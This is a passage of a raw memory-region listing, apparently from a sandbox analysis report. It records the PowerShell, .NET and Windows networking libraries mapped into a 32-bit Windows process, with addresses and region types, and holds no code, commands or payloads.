0x5010fff monitored = 1 entry_point = 0x4ff7a72 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 1061 start_va = 0x290000 end_va = 0x29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 1062 start_va = 0x6c400000 end_va = 0x6c402fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-xstate-l2-1-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-xstate-l2-1-0.dll") Region: id = 1063 start_va = 0x6c370000 end_va = 0x6c3f8fff monitored = 1 entry_point = 0x6c371130 region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll") Region: id = 1064 start_va = 0x2a0000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 1065 start_va = 0x2f0000 end_va = 0x2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1066 start_va = 0x6c310000 end_va = 0x6c363fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.P6f792626#\\fbf36f7901fec6a367af3bc05a96b929\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.p6f792626#\\fbf36f7901fec6a367af3bc05a96b929\\microsoft.powershell.security.ni.dll") Region: id = 1067 start_va = 0x4c40000 end_va = 0x4c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c40000" filename = "" Region: id = 1068 start_va = 0x4d70000 end_va = 0x4daffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d70000" filename = "" Region: id = 1069 start_va = 0x7ef98000 end_va = 0x7ef9afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef98000" filename = "" Region: id = 1070 start_va = 0x6c250000 end_va = 0x6c307fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.transactions.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Transactions\\3d760b4a3260a41ef84a3fd866780980\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.transactions\\3d760b4a3260a41ef84a3fd866780980\\system.transactions.ni.dll") Region: id = 1071 start_va = 0x6c200000 end_va = 0x6c24bfff monitored = 1 entry_point = 0x6c21fcc6 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 1072 start_va = 0x2150000 end_va = 0x219bfff monitored = 1 entry_point = 0x216fcc6 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 1073 start_va = 0x2150000 end_va = 0x219bfff monitored = 1 entry_point = 0x216fcc6 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 1074 start_va = 0x2150000 end_va = 0x219bfff monitored = 1 entry_point = 0x216fcc6 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 1075 start_va = 0x2150000 end_va = 0x219bfff monitored = 1 entry_point = 0x216fcc6 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 1076 start_va = 0x2160000 end_va = 0x219ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 1077 start_va = 0x4e20000 end_va = 0x4e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e20000" filename = "" Region: id = 1078 start_va = 0x7ef95000 end_va = 0x7ef97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef95000" filename = "" Region: id = 1079 start_va = 0x6c1f0000 end_va = 0x6c1f7fff monitored = 0 entry_point = 0x6c1f10e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 1080 start_va = 0x4cc0000 end_va = 0x4d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004cc0000" filename = "" Region: id = 1081 start_va = 0x6c170000 end_va = 0x6c1effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.management.infrastructure.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.Mf49f6405#\\e3134541fd9904dc895922f5256ef8f3\\Microsoft.Management.Infrastructure.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.mf49f6405#\\e3134541fd9904dc895922f5256ef8f3\\microsoft.management.infrastructure.ni.dll") Region: id = 1082 start_va = 0x6c120000 end_va = 0x6c166fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.numerics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Numerics\\e7d6ed984300c7212c6e682c4f730b1e\\System.Numerics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.numerics\\e7d6ed984300c7212c6e682c4f730b1e\\system.numerics.ni.dll") Region: id = 1083 start_va = 0x300000 end_va = 0x30ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 1084 start_va = 0x310000 end_va = 0x31ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1085 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1086 start_va = 0x410000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 1087 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1088 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1089 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1090 start_va = 0x510000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 1091 start_va = 0x520000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 1092 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1093 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1094 start_va = 0x20c0000 end_va = 0x20cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 1095 start_va = 0x2150000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 1096 start_va = 0x6bf80000 end_va = 0x6c117fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.csharp.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.CSharp\\f73f48afb5512225dedaee9c88ac5050\\Microsoft.CSharp.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.csharp\\f73f48afb5512225dedaee9c88ac5050\\microsoft.csharp.ni.dll") Region: id = 1097 start_va = 0x21a0000 end_va = 0x21affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021a0000" filename = "" Region: id = 1098 start_va = 0x21b0000 end_va = 0x21bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 1099 start_va = 0x4280000 end_va = 0x428ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004280000" filename = "" Region: id = 1100 start_va = 0x4290000 end_va = 0x429ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004290000" filename = "" Region: id = 1101 start_va = 0x4290000 end_va = 0x429ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004290000" filename = "" Region: id = 1102 start_va = 0x42a0000 end_va = 0x42affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042a0000" filename = "" Region: id = 1103 start_va = 0x4c10000 end_va = 0x4c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c10000" filename = "" Region: id = 1104 start_va = 0x4eb0000 end_va = 0x4eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004eb0000" filename = "" Region: id = 1105 start_va = 0x4f10000 end_va = 0x4f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f10000" filename = "" Region: id = 1106 start_va = 0x5000000 end_va = 0x503ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005000000" filename = "" Region: id = 1107 start_va = 0x7ef92000 end_va = 0x7ef94fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef92000" filename = "" Region: id = 1108 start_va = 0x7ef98000 end_va = 0x7ef9afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef98000" filename = "" Region: id = 1109 start_va = 0x4f80000 end_va = 0x4fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f80000" filename = "" Region: id = 1110 start_va = 0x5080000 end_va = 0x5a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005080000" filename = "" Region: id = 1111 start_va = 0x7ef8f000 end_va = 0x7ef91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef8f000" filename = "" Region: id = 1112 start_va = 0x73f80000 end_va = 0x73ffffff monitored = 0 entry_point = 0x73f937c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1113 start_va = 0x5a10000 end_va = 0x5b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a10000" filename = "" Region: id = 1114 start_va = 0x4d40000 end_va = 0x4e1efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d40000" filename = "" Region: id = 1115 start_va = 0x73f30000 end_va = 0x73f3dfff monitored = 0 entry_point = 0x73f31235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 1116 start_va = 0x49f0000 end_va = 0x4a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049f0000" filename = "" Region: id = 1117 start_va = 0x5b80000 end_va = 0x5bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b80000" filename = "" Region: id = 1118 start_va = 0x5bc0000 end_va = 0x5cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005bc0000" filename = "" Region: id = 1119 start_va = 0x7ef8c000 end_va = 0x7ef8efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef8c000" filename = "" Region: id = 1120 start_va = 0x5a30000 end_va = 0x5a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a30000" filename = "" Region: id = 1121 start_va = 0x5ad0000 end_va = 0x5b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005ad0000" filename = "" Region: id = 1122 start_va = 0x5d10000 end_va = 0x5d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d10000" filename = "" Region: id = 1123 start_va = 0x7ef89000 end_va = 0x7ef8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef89000" filename = "" Region: id = 1124 start_va = 0x4e60000 end_va = 0x4e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e60000" filename = "" Region: id = 1125 start_va = 0x5d10000 end_va = 0x5d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d10000" filename = "" Region: id = 1126 start_va = 0x7ef89000 end_va = 0x7ef8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef89000" filename = "" Region: id = 1127 start_va = 0x42a0000 end_va = 0x42b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000042a0000" filename = "" Region: id = 1128 start_va = 0x5a50000 end_va = 0x5a8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a50000" filename = "" Region: id = 1129 start_va = 0x5b30000 end_va = 0x5b6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b30000" filename = "" Region: id = 1130 start_va = 0x7ef86000 end_va = 0x7ef88fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef86000" filename = "" Region: id = 1131 start_va = 0x42c0000 end_va = 0x42c1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershellget.psd1" filename = "\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1") Region: id = 1132 start_va = 0x5d50000 end_va = 0x614ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005d50000" filename = "" Region: id = 1133 start_va = 0x4310000 end_va = 0x4311fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershellget.psd1" filename = "\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1") Region: id = 1134 start_va = 0x5d50000 end_va = 0x614ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005d50000" filename = "" Region: id = 1135 start_va = 0x42c0000 end_va = 0x42cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042c0000" filename = "" Region: id = 1136 start_va = 0x4310000 end_va = 0x4310fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psd1" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1") Region: id = 1137 start_va = 0x5d50000 end_va = 0x614ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005d50000" filename = "" Region: id = 1138 start_va = 0x4460000 end_va = 0x4460fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psd1" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1") Region: id = 1139 start_va = 0x5d50000 end_va = 0x614ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005d50000" filename = "" Region: id = 1140 start_va = 0x4520000 end_va = 0x455ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004520000" filename = "" Region: id = 1141 start_va = 0x4fc0000 end_va = 0x4ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004fc0000" filename = "" Region: id = 1142 start_va = 0x7ef86000 end_va = 0x7ef88fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef86000" filename = "" Region: id = 1143 start_va = 0x6b410000 end_va = 0x6bf7dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.commands.utility.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.P521220ea#\\f6f5592245815a51dae8c19cd5d04783\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.p521220ea#\\f6f5592245815a51dae8c19cd5d04783\\microsoft.powershell.commands.utility.ni.dll") Region: id = 1144 start_va = 0x6b3e0000 end_va = 0x6b407fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.install.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Confe64a9051#\\1561b93d6d25c4a9c3e2659ab29a5e73\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.confe64a9051#\\1561b93d6d25c4a9c3e2659ab29a5e73\\system.configuration.install.ni.dll") Region: id = 1145 start_va = 0x4310000 end_va = 0x4317fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 1146 start_va = 0x5d50000 end_va = 0x614ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005d50000" filename = "" Region: id = 1147 start_va = 0x4460000 end_va = 0x4467fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 1148 start_va = 0x5d50000 end_va = 0x614ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005d50000" filename = "" Region: id = 1149 start_va = 0x4310000 end_va = 0x431ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004310000" filename = "" Region: id = 1150 start_va = 0x4460000 end_va = 0x4467fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 1151 start_va = 0x5d50000 end_va = 0x614ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005d50000" filename = "" Region: id = 1152 start_va = 0x4470000 end_va = 0x4477fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 1153 start_va = 0x5d50000 end_va = 0x614ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005d50000" filename = "" Region: id = 1154 start_va = 0x4460000 end_va = 0x446ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004460000" filename = "" Region: id = 1155 start_va = 0x7ef30000 end_va = 0x7ef7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef30000" filename = "" Region: id = 1156 start_va = 0x7ef20000 end_va = 0x7ef2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef20000" filename = "" Region: id = 1157 start_va = 0x74120000 end_va = 0x7412afff monitored = 0 entry_point = 0x74121992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1158 start_va = 0x6b3c0000 end_va = 0x6b3d6fff monitored = 0 entry_point = 0x6b3c35fa region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1159 start_va = 0x73eb0000 end_va = 0x73f01fff monitored = 0 entry_point = 0x73eb14be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 1160 start_va = 0x73e90000 end_va = 0x73ea4fff monitored = 0 entry_point = 0x73e912de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 1161 start_va = 0x73e80000 end_va = 0x73e8cfff monitored = 0 entry_point = 0x73e81326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 1162 start_va = 0x74030000 end_va = 0x7406bfff monitored = 0 entry_point = 0x7403145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1163 start_va = 0x5d50000 end_va = 0x5f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d50000" filename = "" Region: id = 1164 start_va = 0x74020000 end_va = 0x74024fff monitored = 0 entry_point = 0x740215df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 1165 start_va = 0x74010000 end_va = 0x74015fff monitored = 0 entry_point = 0x74011673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 1166 start_va = 0x5a30000 end_va = 0x5a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a30000" filename = "" Region: id = 1167 start_va = 0x5d80000 end_va = 0x5dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d80000" filename = "" Region: id = 1168 start_va = 0x5f40000 end_va = 0x5f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f40000" filename = "" Region: id = 1169 start_va = 0x6b360000 end_va = 0x6b3b7fff monitored = 0 entry_point = 0x6b3613b4 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 1170 start_va = 0x7ef86000 end_va = 0x7ef88fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef86000" filename = "" Region: id = 1171 start_va = 0x6b310000 end_va = 0x6b35efff monitored = 0 entry_point = 0x6b311452 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll") Region: id = 1172 start_va = 0x6b300000 end_va = 0x6b307fff monitored = 0 entry_point = 0x6b3034d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll") Region: id = 1173 start_va = 0x74080000 end_va = 0x7409bfff monitored = 0 entry_point = 0x7408a431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1174 start_va = 0x74070000 end_va = 0x74076fff monitored = 0 entry_point = 0x7407128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1175 start_va = 0x6b2f0000 end_va = 0x6b2fcfff monitored = 0 entry_point = 0x6b2f2012 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 1176 start_va = 0x6b2d0000 end_va = 0x6b2e1fff monitored = 0 entry_point = 0x6b2d3271 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 1177 start_va = 0x5a90000 end_va = 0x5acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a90000" filename = "" Region: id = 1178 start_va = 0x5cc0000 end_va = 0x5cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005cc0000" filename = "" Region: id = 1179 start_va = 0x7ef83000 end_va = 0x7ef85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef83000" filename = "" Region: id = 1180 start_va = 0x740a0000 end_va = 0x740e3fff monitored = 0 entry_point = 0x740b63f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1181 start_va = 0x5dc0000 end_va = 0x5e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005dc0000" filename = "" Region: id = 1182 start_va = 0x74000000 end_va = 0x74005fff monitored = 0 entry_point = 0x740014b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 1183 start_va = 0x73f40000 end_va = 0x73f77fff monitored = 0 entry_point = 0x73f4990e region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 1184 start_va = 0x5f80000 end_va = 0x607ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f80000" filename = "" Region: id = 1185 start_va = 0x6080000 end_va = 0x66befff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006080000" filename = "" Region: id = 1186 start_va = 0x6080000 end_va = 0x66befff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006080000" filename = "" Region: id = 1187 start_va = 0x6080000 end_va = 0x66befff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006080000" filename = "" Region: id = 1188 start_va = 0x6080000 end_va = 0x66befff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006080000" filename = "" Region: id = 1189 start_va = 0x6080000 end_va = 0x66befff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006080000" filename = "" Region: id = 1190 start_va = 0x66c0000 end_va = 0x76bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000066c0000" filename = "" Region: id = 1191 start_va = 0x4520000 end_va = 0x454ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004520000" filename = "" Region: id = 1192 start_va = 0x4460000 end_va = 0x446ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004460000" filename = "" Region: id = 1193 start_va = 0x4460000 end_va = 0x446ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004460000" filename = "" Region: id = 1194 start_va = 0x4460000 end_va = 0x446ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004460000" filename = "" Region: id = 1195 start_va = 0x4470000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004470000" filename = "" Region: id = 1196 start_va = 0x4470000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004470000" filename = "" Region: id = 1197 start_va = 0x44c0000 end_va = 0x44cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 1198 start_va = 0x5df0000 end_va = 0x5e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005df0000" filename 